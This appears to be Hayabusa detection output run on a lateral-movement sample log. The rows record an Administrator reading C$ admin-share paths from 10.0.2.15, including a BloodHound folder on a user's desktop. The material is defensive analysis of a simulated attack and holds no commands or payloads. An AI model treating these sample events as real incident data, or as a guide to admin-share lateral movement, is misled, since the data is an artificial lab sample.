2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\server01$\Desktop  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\server01$\Documents  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\server01$\Downloads  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\server01$\Favorites  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\server01$\Links  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\server01$\Music  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\server01$\Pictures  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\server01$\Saved Games  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\server01$\Videos  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\sshd_server  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\sshd_server\Desktop\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\sshd_server\Documents\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\sshd_server\Downloads\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\sshd_server\Favorites\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\sshd_server\Links\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\sshd_server\Music\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\sshd_server\Pictures\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\sshd_server\Videos\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\sshd_server\Desktop  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\sshd_server\Documents  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\sshd_server\Downloads  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\sshd_server\Favorites  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\sshd_server\Links  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\sshd_server\Music  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\sshd_server\Pictures  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\sshd_server\Saved Games  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\sshd_server\Videos  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Contacts\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Documents\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Downloads\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Favorites\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Links\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Music\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Pictures\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Saved Games\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Searches\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Videos\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Contacts  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.037 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.037 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.037 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.047 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\locales  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.047 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.047 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.057 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\dist  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.057 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\Ingestors  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.057 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\Ingestors\DebugBuilds  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.057 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.067 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.067 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.067 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime\helpers  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.077 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime\node_modules  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.077 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime\regenerator  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.087 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.087 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.087 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\css  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.087 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\js  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.097 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\less  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.097 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\scss  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.107 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\sprites  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.107 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\svgs  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.107 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\webfonts  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.117 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@types  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.117 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\adler-32  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.117 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\adler-32\bin  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
